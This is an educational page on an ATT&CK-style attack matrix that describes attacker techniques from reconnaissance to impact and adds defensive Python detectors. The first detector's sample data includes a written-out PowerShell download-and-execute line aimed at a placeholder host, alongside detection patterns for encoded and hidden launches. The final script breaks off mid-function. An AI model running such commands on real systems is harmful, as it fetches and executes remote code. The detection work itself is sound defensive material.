Cybersecurity Threat & Artificial Intelligence
    Attack Matrix

    The Attack Matrix is a structured framework that maps the complete lifecycle of a cyberattack—from initial reconnaissance to final impact—helping organizations understand how adversaries operate across different stages. By breaking down attacker behavior into phases such as persistence, privilege escalation, lateral movement, and exfiltration, the Attack Matrix provides a clear, actionable view of how threats evolve inside an environment. This approach enables security teams to align detection, prevention, and response strategies with real-world attack patterns, improving visibility across the entire kill chain and strengthening overall cybersecurity posture.

    Reconnaissance to Execution

    Reconnaissance                      | Resource Development          | Initial Access                      | Execution
    ------------------------------------|-------------------------------|-------------------------------------|----------------------------------
    Active Scanning (3)                 | Acquire Access                | Content Injection                   | Cloud Administration
    Gather Victim Host Info (4)         | Acquire Infrastructure (8)    | Drive-by Compromise                 | Command & Script Interpreter (13)
    Gather Victim Identity Info (3)     | Compromise Accounts (3)       | Exploit Public-Facing App           | Container Administration
    Gather Victim Org Info (4)          | Compromise Infrastructure (6) | External Remote Services            | Deploy Container
    Phishing for Info (3)               | Develop Capabilities (4)      | Hardware Additions                  | Inter-Process Communication (3)
    Search Open Technical Databases (5) | Establish Accounts (5)        | Replication Through Removable Media | Native API

    Persistence to Credential Access

    Persistence                          | Privilege Escalation                 | Defense Evasion               | Credential Access
    -------------------------------------|--------------------------------------|-------------------------------|--------------------------------------
    Account Manipulation (7)             | Abuse Elevation Control (6)          | Abuse Elevation Control (6)   | Adversary-in-the-Middle (4)
    BITS Jobs                            | Access Token Manipulation (5)        | Access Token Manipulation (5) | Brute Force (4)
    Boot/Logon Autostart (14)            | Account Manipulation (7)             | BITS Jobs                     | Credentials from Password Stores (6)
    Browser Extensions (3)               | Boot or Logon Autostart (14)         | Build Image on Host           | Forge Credentials (2)
    Create Account (3)                   | Create or Modify System Process (4)  | Debugger Evasion              | Input Capture (4)
    Create or Modify System Process (4)  | Domain Policy Modification (2)       | Deception Operation           | Modify Authentication Process (9)

    Discovery to Command and Control

    Discovery                        | Lateral Movement                 | Collection                    | Command and Control
    ---------------------------------|----------------------------------|-------------------------------|--------------------------------------
    Account Discovery (4)            | Exploitation of Remote Services  | Adversary-in-the-Middle (4)   | Application Layer Protocol (5)
    Application Window Discovery     | Internal Spearphishing           | Archive Collected Data (3)    | Communication Through Removable Media
    Browser Information Discovery    | Lateral Tool Transfer            | Audio Capture                 | Data Encoding (2)
    Cloud Infrastructure Discovery   | Remote Service Session Hijacking | Automated Collection          | Data Obfuscation (2)
    Cloud Service Dashboard          | Remote Services (8)              | Browser Information Discovery | Dynamic Resolution (3)
    Cloud Service Discovery          | Software Deployment Tools        | Clipboard Data                | Encrypted Channel (2)

    Exfiltration and Impact

    Exfiltration                                | Impact
    --------------------------------------------|------------------------------
    Automated Exfiltration (1)                  | Account Access Removal
    Data Transfer Size Limits                   | Data Destruction (1)
    Exfiltration Over Alternative Protocol (3)  | Data Encrypted for Impact (3)
    Exfiltration Over C2 Channel                | Data Manipulation (3)
    Exfiltration Over Other Network Medium (2)  | Defacement (2)
    Exfiltration Over Physical Medium           | Disk Wipe (2)

    Attack Matrix: Reconnaissance to Execution

    What is the Attack Matrix?

    The Attack Matrix represents the lifecycle of a cyberattack—from early-stage intelligence gathering (Reconnaissance) to actual payload execution (Execution). It maps attacker behavior into structured phases, helping defenders understand how threats evolve and where to detect or stop them.

    This model aligns conceptually with MITRE ATT&CK, where each tactic contains multiple techniques adversaries use to compromise systems.

    Reconnaissance

    Overview

    Reconnaissance is the initial phase of an attack, where adversaries collect information about targets such as infrastructure, users, and technologies. This phase is often passive but can also involve active probing. The goal is to identify attack surfaces, weak points, and potential entry vectors.

    Techniques

    Active Scanning (3)

    Attackers actively probe networks, systems, or applications to identify open ports, services, and vulnerabilities.
    This includes scanning tools that send packets to detect live hosts and exposed services.
    It can trigger alerts in IDS/IPS systems due to abnormal traffic patterns.
    Frequent scanning from unknown IPs is often an early indicator of reconnaissance.

    Gather Victim Host Information (4)

    This involves collecting data about specific systems, including OS versions, installed software, and configurations.
    Attackers may use fingerprinting techniques to identify exploitable environments.
    The information helps tailor attacks like exploits or malware delivery.
    Even minor misconfigurations discovered here can be leveraged later.

    Gather Victim Identity Information (3)

    Adversaries collect user-related data such as email addresses, usernames, and roles.
    This information is often sourced from social media, leaked databases, or corporate directories.
    It enables targeted attacks like spear phishing or credential stuffing.
    Identity intelligence increases the success rate of social engineering campaigns.

    Gather Victim Organization Information (4)

    Attackers study organizational structure, business operations, and technologies used.
    Public sources like websites, job postings, and press releases are commonly used.
    This helps identify critical systems and high-value targets.
    Understanding the organization improves attack planning and evasion strategies.

    Phishing for Information (3)

    This technique involves tricking users into revealing sensitive data such as credentials or internal details.
    Emails, fake login pages, or social engineering tactics are used.
    It is often used early to validate targets or gain initial insights.
    Successful phishing can directly lead to initial access.

    Search Open Technical Databases (5)

    Attackers leverage publicly available databases like CVE listings, GitHub, or Shodan.
    They look for exposed assets, known vulnerabilities, or misconfigured services.
    This is a low-noise method that avoids detection.
    It enables attackers to map attack surfaces without interacting directly with targets.

    Resource Development

    Overview

    In this phase, attackers prepare the infrastructure and capabilities required for an attack. This includes acquiring domains, building malware, and compromising accounts. It bridges reconnaissance and exploitation.

    Techniques

    Acquire Access

    Attackers obtain credentials or access tokens through leaks, purchases, or prior compromises.
    This may include stolen VPN credentials or cloud access keys.
    Access acquisition reduces the need for exploitation later.
    It enables stealthy entry into environments.

    Acquire Infrastructure (8)

    Adversaries set up servers, domains, or cloud resources for hosting malware or command-and-control (C2).
    Infrastructure can include VPS servers or compromised websites.
    It supports phishing campaigns, payload delivery, and data exfiltration.
    Well-prepared infrastructure improves attack resilience.

    Compromise Accounts (3)

    Existing accounts are taken over using credential theft, brute force, or credential stuffing.
    These accounts may belong to employees, admins, or service accounts.
    Compromised accounts provide legitimate access paths.
    This technique is commonly used in cloud and SaaS attacks.

    Compromise Infrastructure (6)

    Attackers take control of legitimate infrastructure such as websites or servers.
    This infrastructure can then be used to host malicious content or redirect traffic.
    It helps bypass security controls due to trusted domains.
    This is often seen in supply chain or watering hole attacks.

    Develop Capabilities (4)

    Adversaries create or customize tools, malware, or exploit kits.
    This includes obfuscation techniques to evade detection.
    Capabilities are often tailored to target environments.
    Custom tooling increases stealth and effectiveness.

    Establish Accounts (5)

    Attackers create new accounts within systems, often with persistence in mind.
    These may include cloud users or application-level accounts.
    They are used to maintain long-term access.
    Detection can be difficult if accounts appear legitimate.

    Initial Access

    Overview

    Initial Access is where attackers first gain entry into the target environment. This phase is critical, as it determines whether the attack progresses further.

    Techniques

    Content Injection

    Attackers insert malicious code into legitimate websites or applications.
    This can affect users visiting compromised pages.
    It is often used in web-based attacks like XSS or supply chain compromises.
    Users interacting with infected content may unknowingly execute payloads.

    Drive-by Compromise

    Users are infected simply by visiting a compromised or malicious website.
    No explicit action is required beyond browsing.
    Exploits target browser or plugin vulnerabilities.
    This technique is commonly used in mass exploitation campaigns.

    Exploit Public-Facing Application

    Attackers exploit vulnerabilities in internet-facing applications such as web servers.
    Common examples include SQL injection or RCE vulnerabilities.
    Successful exploitation can provide direct system access.
    Unpatched applications are a major risk factor.

    External Remote Services

    Adversaries gain access through exposed services like VPN, RDP, or SSH.
    This often involves stolen credentials or weak authentication.
    It is a common entry vector in ransomware attacks.
    Monitoring login anomalies is key for detection.

    Hardware Additions

    Physical devices such as rogue USBs or network implants are introduced.
    These devices can execute malware or intercept traffic.
    It requires physical access or insider involvement.
    Though less common, it can bypass traditional defenses.

    Replication Through Removable Media

    Malware spreads via USB drives or external storage devices.
    This technique is often used in air-gapped environments.
    It enables propagation without network connectivity.
    Detection relies on endpoint monitoring and device control policies.

    Execution

    Overview

    Execution is the phase where malicious code is run within the victim environment. This is where attackers begin actively controlling systems, deploying malware, or executing commands.

    Techniques

    Cloud Administration

    Attackers use cloud management interfaces or APIs to execute actions.
    This includes creating resources, modifying configurations, or exfiltrating data.
    It often leverages compromised cloud credentials.
    Cloud-native visibility is critical for detection.

    Command & Script Interpreter (13)

    Attackers execute commands using tools like PowerShell, Bash, or CMD.
    These interpreters are legitimate tools abused for malicious purposes.
    This technique supports fileless attacks and lateral movement.
    Monitoring unusual command execution is essential.
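As an added, defender-side illustration of the "unusual command execution" monitoring this technique calls for (example code written for this page, not from the original), the following scores process-creation events on two traits: a script interpreter launched by a parent that should not need one, and command-line patterns typical of hidden or fileless launches. The event records, field names, parent list and thresholds are constructed assumptions shaped like Sysmon Event ID 1 telemetry, not any product's schema.

```python
"""Flag suspicious command and script interpreter launches from process-creation events.

Added example, not from the original page. SAMPLE_EVENTS is a constructed sample shaped
like Sysmon Event ID 1 / EDR process telemetry; PIDs, paths and command lines are illustrative.
"""
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Parents that rarely have a legitimate reason to spawn a shell (office apps, PDF reader, web server worker).
UNUSUAL_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe", "w3wp.exe"}
# Command-line traits typical of hidden, encoded or download-and-execute launches.
CMDLINE_MARKERS = {
    "encoded command": re.compile(r"-(enc|encodedcommand)\b", re.I),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "in-memory execution": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "remote download": re.compile(r"Download(String|File)\(|Invoke-WebRequest", re.I),
}


def _basename(path):
    """Last path component, lower-cased, for either separator style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons) for one event; 0 means not an interpreter or nothing unusual."""
    reasons = []
    if _basename(event["image"]) not in INTERPRETERS:
        return 0, reasons
    parent = _basename(event["parent_image"])
    if parent in UNUSUAL_PARENTS:
        reasons.append(f"interpreter spawned by {parent}")
    for label, pattern in CMDLINE_MARKERS.items():
        if pattern.search(event["command_line"]):
            reasons.append(label)
    return len(reasons), reasons


def triage(events, min_score=1):
    """Events worth an analyst's attention as (pid, score, reasons), highest score first."""
    scored = [(e["pid"], *score_event(e)) for e in events]
    return sorted([s for s in scored if s[1] >= min_score], key=lambda s: -s[1])


SAMPLE_EVENTS = [  # constructed sample; the base64 is the string "PLACEHOLDER", not a payload
    {"pid": 1001, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\Users"},
    {"pid": 1002, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -enc UExBQ0VIT0xERVI="},
    {"pid": 1003, "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"pid": 1004, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c C:\\Scripts\\nightly-backup.bat"},
    {"pid": 1005, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": "pwsh.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""},
]

if __name__ == "__main__":
    for pid, score, reasons in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: score {score}: {'; '.join(reasons)}")
```

The Word-spawned, hidden, encoded launch (pid 1002) scores highest; the scheduled backup batch file (pid 1004) and the interactive directory listing (pid 1001) are not flagged.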

    Container Administration

    Adversaries interact with container environments such as Docker or Kubernetes.
    They may deploy or modify containers to run malicious workloads.
    Container misconfigurations are often exploited.
    Visibility into container activity is crucial.

    Deploy Container

    Attackers deploy new containers containing malicious payloads.
    These containers can be used for persistence or cryptomining.
    They blend into normal cloud-native operations.
    Security controls must include container runtime monitoring.

    Inter-Process Communication (3)

    Malicious processes communicate with other processes to execute tasks.
    This includes techniques like DLL injection or process hollowing.
    It allows attackers to hide within legitimate processes.
    Behavioral detection is key to identifying such activity.

    Native API

    Attackers use operating system APIs directly to perform malicious actions.
    This avoids higher-level detection mechanisms.
    It is often used in advanced malware.
    Low-level monitoring is required to detect such behavior.

    Key Takeaways

    • The attack matrix provides a structured view of attacker behavior across stages
    • Early phases like Reconnaissance and Resource Development are often invisible
    • Initial Access and Execution are critical detection points
    • Mapping techniques to detection controls improves SOC visibility and response
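To make the last takeaway concrete, here is an added example (not part of the original page) that loads the four matrix tables above as data, finds the techniques the matrix lists under more than one tactic, and reports which tactics a constructed, hypothetical set of detection rules leaves uncovered. The rule names and the technique each maps to are assumptions for illustration; tactic and technique names are transcribed from the tables, treating the page's "Boot/Logon Autostart" and "Boot or Logon Autostart" as one technique.

```python
"""Coverage of the page's Attack Matrix by a set of detection rules.

Added example, not from the original page. ATTACK_MATRIX is transcribed from the matrix
tables (sub-technique counts dropped); DETECTION_RULES is a constructed, hypothetical sample.
"""
from collections import defaultdict

ATTACK_MATRIX = {
    "Reconnaissance": ("Active Scanning", "Gather Victim Host Info", "Gather Victim Identity Info",
                       "Gather Victim Org Info", "Phishing for Info", "Search Open Technical Databases"),
    "Resource Development": ("Acquire Access", "Acquire Infrastructure", "Compromise Accounts",
                             "Compromise Infrastructure", "Develop Capabilities", "Establish Accounts"),
    "Initial Access": ("Content Injection", "Drive-by Compromise", "Exploit Public-Facing App",
                       "External Remote Services", "Hardware Additions", "Replication Through Removable Media"),
    "Execution": ("Cloud Administration", "Command & Script Interpreter", "Container Administration",
                  "Deploy Container", "Inter-Process Communication", "Native API"),
    "Persistence": ("Account Manipulation", "BITS Jobs", "Boot/Logon Autostart", "Browser Extensions",
                    "Create Account", "Create or Modify System Process"),
    "Privilege Escalation": ("Abuse Elevation Control", "Access Token Manipulation", "Account Manipulation",
                             "Boot/Logon Autostart", "Create or Modify System Process", "Domain Policy Modification"),
    "Defense Evasion": ("Abuse Elevation Control", "Access Token Manipulation", "BITS Jobs",
                        "Build Image on Host", "Debugger Evasion", "Deception Operation"),
    "Credential Access": ("Adversary-in-the-Middle", "Brute Force", "Credentials from Password Stores",
                          "Forge Credentials", "Input Capture", "Modify Authentication Process"),
    "Discovery": ("Account Discovery", "Application Window Discovery", "Browser Information Discovery",
                  "Cloud Infrastructure Discovery", "Cloud Service Dashboard", "Cloud Service Discovery"),
    "Lateral Movement": ("Exploitation of Remote Services", "Internal Spearphishing", "Lateral Tool Transfer",
                         "Remote Service Session Hijacking", "Remote Services", "Software Deployment Tools"),
    "Collection": ("Adversary-in-the-Middle", "Archive Collected Data", "Audio Capture",
                   "Automated Collection", "Browser Information Discovery", "Clipboard Data"),
    "Command and Control": ("Application Layer Protocol", "Communication Through Removable Media",
                            "Data Encoding", "Data Obfuscation", "Dynamic Resolution", "Encrypted Channel"),
    "Exfiltration": ("Automated Exfiltration", "Data Transfer Size Limits",
                     "Exfiltration Over Alternative Protocol", "Exfiltration Over C2 Channel",
                     "Exfiltration Over Other Network Medium", "Exfiltration Over Physical Medium"),
    "Impact": ("Account Access Removal", "Data Destruction", "Data Encrypted for Impact",
               "Data Manipulation", "Defacement", "Disk Wipe"),
}

# Hypothetical deployed detections: rule name -> the matrix technique it covers (constructed sample).
DETECTION_RULES = {
    "SIEM: >20 failed logins from one source in 5 min": "Brute Force",
    "EDR: new Run key or scheduled task created by a user process": "Boot/Logon Autostart",
    "EDR: BITS job created outside of patch management": "BITS Jobs",
    "IAM: account added to a privileged group": "Account Manipulation",
    "Proxy: fixed-interval beaconing to a rare domain": "Application Layer Protocol",
    "EDR: bulk archive creation in a user profile": "Archive Collected Data",
    "Cloud: resource enumeration API calls from a new principal": "Cloud Infrastructure Discovery",
}


def shared_techniques(matrix):
    """Techniques the matrix lists under more than one tactic, so one detection serves several tactics."""
    owners = defaultdict(list)
    for tactic, techniques in matrix.items():
        for technique in techniques:
            owners[technique].append(tactic)
    return {t: tactics for t, tactics in owners.items() if len(tactics) > 1}


def coverage_report(matrix, rules):
    """Per tactic: which techniques at least one rule covers, which none does, and the ratio."""
    covered = set(rules.values())
    report = {}
    for tactic, techniques in matrix.items():
        hit = [t for t in techniques if t in covered]
        miss = [t for t in techniques if t not in covered]
        report[tactic] = {"covered": hit, "uncovered": miss, "ratio": len(hit) / len(techniques)}
    return report


def weakest_tactics(report, n=3):
    """The n tactics with the lowest coverage ratio (ties keep matrix order)."""
    return sorted(report, key=lambda tactic: report[tactic]["ratio"])[:n]


if __name__ == "__main__":
    report = coverage_report(ATTACK_MATRIX, DETECTION_RULES)
    for tactic, row in report.items():
        print(f"{tactic:22s} {row['ratio']:.0%} covered; missing: {', '.join(row['uncovered'])}")
    print("shared:", shared_techniques(ATTACK_MATRIX))
```

With this rule set the early phases show 0% coverage, which matches the takeaway that Reconnaissance and Resource Development are often invisible, and the eight shared techniques show where a single detection pays off twice.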

    Attack Matrix: Persistence to Credential Access

    What This Phase Covers

    After gaining initial access and executing code, attackers aim to maintain control, escalate privileges, evade detection, and ultimately steal credentials.

    This phase is critical because it determines:

    • How long attackers remain undetected
    • Whether they gain administrative control
    • How they move deeper into the environment

    It includes four major tactics:

    • Persistence – Maintaining long-term access
    • Privilege Escalation – Gaining higher-level permissions
    • Defense Evasion – Avoiding detection mechanisms
    • Credential Access – Stealing authentication data

    Understanding this stage helps defenders disrupt attacks before lateral movement or data exfiltration occurs, in line with structured threat modeling practices.

    Persistence

    Overview

    Persistence techniques allow attackers to retain access across reboots, logouts, or credential resets. These techniques ensure that even if initial entry points are closed, attackers can re-enter the system.

    Techniques

    Account Manipulation (7)

    Attackers modify existing accounts to maintain access, such as adding privileges or altering credentials.
    This can include changing group memberships or disabling security controls.
    It enables long-term persistence using legitimate identities.
    Such changes often blend into normal administrative activity.

    BITS Jobs

    Background Intelligent Transfer Service (BITS) is abused to download or execute malicious payloads.
    BITS jobs can persist across reboots and run in the background.
    This technique is stealthy because it uses a trusted Windows service.
    Detection requires monitoring unusual BITS job creation.

    Boot/Logon Autostart (14)

    Malicious programs are configured to run automatically at system startup or user logon.
    This includes registry run keys, startup folders, or scheduled tasks.
    It ensures payload execution without user interaction.
    Widely used by malware for persistence.

    Browser Extensions (3)

    Attackers install malicious browser extensions to maintain access and monitor activity.
    Extensions can capture data, inject scripts, or redirect traffic.
    They persist within the browser environment.
    Often overlooked in traditional endpoint security monitoring.

    Create Account (3)

    New user accounts are created to maintain unauthorized access.
    These accounts may appear legitimate or mimic existing users.
    They provide fallback access if other methods are removed.
    Monitoring unauthorized account creation is critical.

    Create or Modify System Process (4)

    Attackers alter system processes or create new ones to maintain persistence.
    This may involve injecting code into trusted processes.
    It helps evade detection by blending with normal operations.
    Behavioral analysis is required for detection.

    Privilege Escalation

    Overview

    Privilege escalation techniques allow attackers to gain higher-level permissions, such as administrator or root access. This enables deeper control over systems and access to sensitive resources.

    Techniques

    Abuse Elevation Control (6)

    Attackers exploit mechanisms like UAC (User Account Control) to elevate privileges.
    This may involve bypassing prompts or exploiting misconfigurations.
    It allows execution of high-privilege actions.
    Often used immediately after initial access.

    Access Token Manipulation (5)

    Attackers manipulate access tokens to impersonate other users or processes.
    This enables privilege escalation without needing credentials.
    It is commonly used in Windows environments.
    Detection involves monitoring token usage anomalies.

    Account Manipulation (7)

    Existing accounts are modified to grant elevated privileges.
    This may include adding users to admin groups.
    It provides persistent elevated access.
    Changes can be subtle and hard to detect.

    Boot or Logon Autostart (14)

    Autostart mechanisms are leveraged to execute code with higher privileges.
    Misconfigured services or tasks may run with elevated rights.
    Attackers exploit these to gain privilege escalation.
    Requires auditing of startup configurations.

    Create or Modify System Process (4)

    Attackers create or hijack processes running with elevated privileges.
    This enables execution of privileged operations.
    Often involves process injection techniques.
    Monitoring parent-child process relationships helps detect it.

    Domain Policy Modification (2)

    Attackers modify domain-level policies to escalate privileges across systems.
    This can impact multiple users and machines.
    It provides widespread control in enterprise environments.
    Highly critical and requires strict monitoring.

    Defense Evasion

    Overview

    Defense evasion techniques are used to avoid detection by security tools such as antivirus, EDR, SIEM, and IDS systems. These techniques help attackers remain hidden while continuing operations.

    Techniques

    Abuse Elevation Control (6)

    Attackers exploit privilege mechanisms to bypass security restrictions.
    This may disable or circumvent security prompts.
    It allows malicious actions to proceed undetected.
    Often overlaps with privilege escalation.

    Access Token Manipulation (5)

    Token manipulation is used to bypass security controls and impersonate trusted entities.
    It helps evade detection by appearing legitimate.
    Attackers can execute actions under trusted contexts.
    Detection requires identity and behavior monitoring.

    BITS Jobs

    BITS is used to transfer malicious payloads stealthily.
    Because it is a legitimate service, it avoids suspicion.
    It enables covert data transfer and execution.
    Monitoring unusual BITS activity is key.

    Build Image on Host

    Attackers create or modify system images locally to evade detection.
    This may include staging payloads within legitimate images.
    It helps bypass traditional file-based detection.
    Often used in advanced persistent threats (APTs).

    Debugger Evasion

    Malware detects debugging or analysis environments and alters behavior.
    This prevents security researchers from analyzing it.
    It helps avoid detection by sandbox environments.
    Common in sophisticated malware families.

    Deception Operation

    Attackers use fake artifacts or misleading activity to confuse defenders.
    This includes generating noise or false indicators.
    It delays detection and response efforts.
    Often used in advanced campaigns.

    Credential Access

    Overview

    Credential access techniques focus on stealing authentication data, enabling attackers to move laterally and escalate privileges further. This is a key objective in most cyberattacks.

    Techniques

    Adversary-in-the-Middle (4)

    Attackers intercept communications between users and systems.
    This allows capture of credentials during authentication.
    Often involves proxying or session hijacking techniques.
    Common in phishing and network attacks.

    Brute Force (4)

    Attackers attempt multiple password combinations to gain access.
    This can target login portals, APIs, or services.
    Weak passwords significantly increase risk.
    Detection involves monitoring login failures and anomalies.
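An added example (not from the original page) of the "login failures and anomalies" monitoring this technique calls for: it parses constructed sshd-style failure lines and separates password guessing (many failures against one account from one source) from password spraying (one or two attempts each against many accounts, which stays under per-account lockout thresholds). The window size and thresholds are assumptions to tune per environment, and the IP addresses are documentation ranges.

```python
"""Detect password-guessing and password-spraying patterns in authentication failures.

Added example, not from the original page. SAMPLE_LOG is a constructed sample in sshd's
"Failed password" format; window and thresholds are illustrative assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse(lines):
    """Return (timestamp, user, source_ip) for every line that is a failed password event."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["user"], m["ip"]))
    return events


def detect(events, window=timedelta(minutes=5), guess_threshold=10, spray_users=5):
    """Map each source IP to the first pattern it triggers inside any sliding window.

    password_guessing: one account fails at least guess_threshold times.
    password_spraying: at least spray_users distinct accounts fail, none more than twice.
    """
    by_ip = defaultdict(list)
    for ts, user, ip in sorted(events):
        by_ip[ip].append((ts, user))
    alerts = {}
    for ip, attempts in by_ip.items():
        start = 0
        for end in range(len(attempts)):
            # Slide the window start forward until it spans at most `window`.
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            per_user = defaultdict(int)
            for _, user in attempts[start:end + 1]:
                per_user[user] += 1
            if max(per_user.values()) >= guess_threshold:
                alerts[ip] = "password_guessing"
                break
            if len(per_user) >= spray_users and max(per_user.values()) <= 2:
                alerts[ip] = "password_spraying"
                break
    return alerts


def _line(ts, user, ip, invalid=False):
    """Build one constructed sshd-style failure line."""
    marker = "invalid user " if invalid else ""
    return f"{ts} bastion sshd[4242]: Failed password for {marker}{user} from {ip} port 51000 ssh2"


SAMPLE_LOG = (
    # 12 failures for root from one source within one minute: guessing.
    [_line(f"2026-05-01T09:00:{s:02d}", "root", "203.0.113.7") for s in range(0, 60, 5)]
    # one failure each for six different accounts from one source: spraying.
    + [_line(f"2026-05-01T09:10:{s:02d}", u, "198.51.100.23", invalid=True)
       for s, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    # two failures for one user: a typo, below both thresholds.
    + [_line("2026-05-01T09:20:00", "alice", "192.0.2.5"), _line("2026-05-01T09:20:30", "alice", "192.0.2.5")]
)

if __name__ == "__main__":
    for ip, pattern in detect(parse(SAMPLE_LOG)).items():
        print(f"{ip}: {pattern}")
```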

    Credentials from Password Stores (6)

    Stored credentials are extracted from browsers, OS vaults, or applications.
    This includes password managers or cached credentials.
    Attackers gain access without user interaction.
    Endpoint monitoring is critical for detection.

    Forge Credentials (2)

    Attackers create fake authentication tokens or tickets.
    This allows access without valid credentials.
    Common in advanced attacks targeting identity systems.
    Detection requires strong identity validation controls.

    Input Capture (4)

    User input such as keystrokes is captured using keyloggers.
    This includes credentials entered into login forms.
    It can occur at the OS or application level.
    Often difficult to detect without behavioral monitoring.

    Modify Authentication Process (9)

    Attackers alter authentication mechanisms to capture or bypass credentials.
    This may involve tampering with login processes or libraries.
    It enables persistent credential theft.
    Highly advanced and critical to detect early.

    Key Takeaways

    • Persistence ensures attackers remain inside environments long-term
    • Privilege escalation enables full system or domain control
    • Defense evasion allows attackers to operate undetected
    • Credential access is the gateway to lateral movement and data compromise

    Attack Matrix: Discovery to Command and Control

    What This Phase Covers

    Once attackers establish persistence and gain access to credentials, they move into internal exploration and operational control. This phase includes:

    • Discovery – Understanding the environment
    • Lateral Movement – Expanding access across systems
    • Collection – Gathering sensitive data
    • Command and Control (C2) – Maintaining communication with attacker infrastructure

    This stage is critical because it transforms an initial breach into a full-scale compromise, enabling data theft, surveillance, or disruption.

    Discovery

    Overview

    Discovery techniques are used by attackers to map the internal environment, identify valuable assets, and understand how systems and users interact. This phase helps attackers plan lateral movement and data collection.

    Techniques

    Account Discovery (4)

    Attackers enumerate user accounts, groups, and roles within a system or domain.
    This helps identify privileged accounts and potential targets.
    It often involves querying directories like Active Directory.
    Detection includes monitoring unusual account enumeration activity.

    Application Window Discovery

    Attackers identify open application windows on a system.
    This helps determine what software is actively being used.
    It can reveal sensitive applications like finance or admin tools.
    Often used in targeted attacks to prioritize actions.

    Browser Information Discovery

    Information such as browsing history, bookmarks, and stored data is collected.
    This reveals user behavior and accessed services.
    It can expose login portals or sensitive web applications.
    Often overlaps with credential harvesting efforts.

    Cloud Infrastructure Discovery

    Attackers enumerate cloud resources such as VMs, storage, and networks.
    This is common in AWS, Azure, and GCP environments.
    It helps identify exposed services and misconfigurations.
    Cloud logging and API monitoring are key for detection.

    Cloud Service Dashboard

    Attackers access cloud dashboards to view configurations and resources.
    This provides a centralized view of the environment.
    It can expose sensitive data and administrative controls.
    Often achieved using stolen cloud credentials.

    Cloud Service Discovery

    Attackers identify cloud services in use, such as SaaS applications.
    This includes email platforms, storage services, and APIs.
    It helps expand attack surface understanding.
    Critical for targeting cloud-native environments.

    Lateral Movement

    Overview

    Lateral movement allows attackers to move from one system to another, expanding their foothold. This phase is essential for reaching high-value systems and achieving broader compromise.

    Techniques

    Exploitation of Remote Services

    Attackers exploit vulnerabilities in internal services to move laterally.
    This includes exploiting SMB, RDP, or RPC services.
    It allows direct access to additional systems.
    Unpatched services increase risk significantly.

    Internal Spearphishing

    Targeted phishing attacks are launched within the organization.
    Compromised accounts are often used to send convincing messages.
    This helps gain access to additional users.
    Detection involves monitoring abnormal email behavior.

    Lateral Tool Transfer

    Attackers transfer tools or malware between systems.
    This enables execution of payloads on new targets.
    It often uses file shares or administrative tools.
    Monitoring file movement between hosts is essential.

    Remote Service Session Hijacking

    Active sessions are hijacked to gain access without credentials.
    This includes stealing or reusing session tokens.
    It allows attackers to impersonate legitimate users.
    Session monitoring is critical for detection.

    Remote Services (8)

    Attackers use legitimate remote services like RDP or SSH to move laterally.
    This often involves stolen credentials.
    It blends with normal administrative activity.
    Login anomaly detection is key.
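    The login anomaly detection this entry names, as an added example that is not code from this page or from any product: it compares a day of constructed RDP/SSH/SMB logon records against a constructed baseline of (account, destination host) pairs and flags an account that reaches several hosts it has never touched before within a short window, marking whether the burst fell outside business hours. The records, the 15-minute window, the host count and the business-hours range (in UTC) are assumptions.

```python
"""Flag remote-logon fan-out that departs from an account's baseline.

Added example for this page, not code from the page or any product.
Baseline and logon records are constructed; thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed baseline: (account, destination host) pairs seen in the previous
# 30 days of successful remote logons.
BASELINE_PAIRS = {
    ("CORP\\jdoe", "WS-JDOE"),
    ("CORP\\svc-backup", "FS01"),
    ("CORP\\svc-backup", "FS02"),
}

# Constructed current-day logons: (time, account, source host, destination host, service).
SAMPLE_LOGONS = [
    ("2026-05-08T02:10:00Z", "CORP\\jdoe", "WS-JDOE", "FS01", "rdp"),
    ("2026-05-08T02:11:30Z", "CORP\\jdoe", "WS-JDOE", "SQL01", "rdp"),
    ("2026-05-08T02:13:00Z", "CORP\\jdoe", "WS-JDOE", "DC01", "rdp"),
    ("2026-05-08T02:14:20Z", "CORP\\jdoe", "WS-JDOE", "FS02", "rdp"),
    ("2026-05-08T02:16:00Z", "CORP\\jdoe", "WS-JDOE", "APP03", "ssh"),
    ("2026-05-08T09:00:00Z", "CORP\\svc-backup", "BKP01", "FS01", "smb"),
    ("2026-05-08T09:05:00Z", "CORP\\svc-backup", "BKP01", "FS02", "smb"),
]


def parse_time(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")


def find_lateral_fanout(logons, baseline, window=timedelta(minutes=15),
                        min_new_hosts=3, business_hours=(7, 19)):
    """One alert per account whose logons inside any `window` reach at least
    `min_new_hosts` destinations absent from `baseline`."""
    by_account = defaultdict(list)
    for stamp, account, src, dst, service in logons:
        by_account[account].append((parse_time(stamp), src, dst, service))
    alerts = []
    for account, evs in by_account.items():
        evs.sort(key=lambda e: e[0])
        for i, (start, _, _, _) in enumerate(evs):
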